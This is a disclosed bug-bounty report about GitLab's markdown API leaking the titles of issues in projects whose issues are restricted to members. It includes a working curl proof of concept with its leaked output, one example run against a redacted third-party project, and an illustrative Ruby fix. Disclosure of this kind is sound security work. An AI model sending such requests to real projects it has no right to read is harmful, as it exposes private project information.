
GFM markdown API discloses issue titles of limited projects

HackerOne report #1450306 by shells3c on 2022-01-15, assigned to @nmalcolm:


Report

Summary

GFM markdown API allows unauthenticated users to read issue titles of projects that have permission for issues set to Only Project Members

Steps to reproduce
  1. Create a project and set Issues visibility to Only Project Members.
  2. Create an issue.
  3. Execute this command (replace [user]/[project] with your project namespace):

     curl -H 'Content-Type: application/json' -d '{"project":"[username]/[project]","text":"See #1","gfm":true}' 'https://gitlab.com/api/v4/markdown'

  4. The response will disclose the title of issue #1 (attribute title):

     {"html":"\u003cp data-sourcepos=\"1:1-1:6\" dir=\"auto\"\u003eSee \u003ca href=\"https://gitlab.com/[user]/[project]/-/issues/1\" data-original=\"#1\" data-link=\"false\" data-link-reference=\"false\" data-project=\"[Project ID]\" data-issue=\"[Issue ID]\" data-reference-type=\"issue\" data-container=\"body\" data-placement=\"top\" title=\"This is a private issue\" class=\"gfm gfm-issue has-tooltip\"\u003e#1\u003c/a\u003e\u003c/p\u003e"}
Examples

Visit: https://gitlab.com/[REDACTED]/alertmanager/-/issues and you can see that the visibility is restricted. Now execute this command:

curl -H 'Content-Type: application/json' -d '{"project":"[REDACTED]/alertmanager","text":"See #7","gfm":true}' 'https://gitlab.com/api/v4/markdown'

Response:

{"html":"\u003cp data-sourcepos=\"1:1-1:6\" dir=\"auto\"\u003eSee \u003ca href=\"https://gitlab.com/[REDACTED]/alertmanager/-/issues/7\" data-original=\"#7\" data-link=\"false\" data-link-reference=\"false\" data-project=\"25681831\" data-issue=\"100690987\" data-reference-type=\"issue\" data-container=\"body\" data-placement=\"top\" title=\"Internal\" class=\"gfm gfm-issue has-tooltip\"\u003e#7\u003c/a\u003e\u003c/p\u003e"}

As you can see, the title of issue #7 is "Internal"; you can check other issues if you want.
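The root cause described above is a reference renderer that copies an issue's title into the link's title attribute without checking whether the requesting user may read that issue. The following Ruby model is an added illustration, not GitLab's own code: the Issue and Project structs, the can_read_issue? check and both render functions are hypothetical, and it shows the leaking renderer beside a hardened one that resolves the reference only for users allowed to see the issue.

```ruby
require 'cgi'

# Constructed sample models (hypothetical; not GitLab's classes or API).
Issue   = Struct.new(:iid, :title)
Project = Struct.new(:path, :issues_visibility, :members, :issues)

# Hypothetical access check modelled on the report: when issue visibility is
# :members_only, only project members may read an issue (and its title).
def can_read_issue?(project, user)
  return true if project.issues_visibility == :public
  !user.nil? && project.members.include?(user)
end

def issue_link(project, issue)
  title = CGI.escapeHTML(issue.title)
  %(<a href="/#{project.path}/-/issues/#{issue.iid}" title="#{title}">##{issue.iid}</a>)
end

# Vulnerable renderer: any "#N" that resolves to an issue gets a link whose
# title attribute carries the issue title, regardless of who is asking.
def render_vulnerable(project, text)
  text.gsub(/#(\d+)/) do |match|
    issue = project.issues.find { |i| i.iid == Regexp.last_match(1).to_i }
    issue ? issue_link(project, issue) : match
  end
end

# Hardened renderer: the reference is resolved (and the title exposed) only
# when the requesting user can read the issue; otherwise "#N" stays plain text.
def render_fixed(project, text, user)
  text.gsub(/#(\d+)/) do |match|
    issue = project.issues.find { |i| i.iid == Regexp.last_match(1).to_i }
    next match unless issue && can_read_issue?(project, user)
    issue_link(project, issue)
  end
end

# Constructed private project mirroring the report's example.
PRIVATE = Project.new('group/alertmanager', :members_only, ['alice'],
                      [Issue.new(7, 'Internal')])

if __FILE__ == $0
  puts render_vulnerable(PRIVATE, 'See #7')      # leaks title="Internal" to anyone
  puts render_fixed(PRIVATE, 'See #7', nil)      # anonymous caller: See #7
  puts render_fixed(PRIVATE, 'See #7', 'alice')  # member: link with title
end
```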

Output of checks

This bug happens on GitLab.com

Impact

Accessing all issue titles of projects whose issue visibility is set to Only Project Members.

How To Reproduce

Please add reproducibility information to this section:

Edited by Costel Maxim